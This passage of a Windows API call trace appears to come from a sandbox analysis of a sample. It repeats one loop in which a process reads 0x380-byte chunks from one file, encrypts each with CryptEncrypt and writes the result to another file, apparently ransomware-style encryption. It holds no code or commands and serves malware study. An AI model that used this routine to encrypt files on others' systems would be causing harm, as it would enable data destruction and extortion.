ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.241] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.241] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.241] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.242] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.242] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.242] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.242] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.242] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.243] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.243] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.243] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.243] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.244] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.244] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.244] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.244] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.244] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.244] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.244] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.245] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.245] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.245] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.245] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.245] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.245] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.246] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.246] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.246] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.246] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.246] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.246] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.246] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.247] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.247] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.247] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.247] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.247] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.247] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.248] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.248] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.248] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.248] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 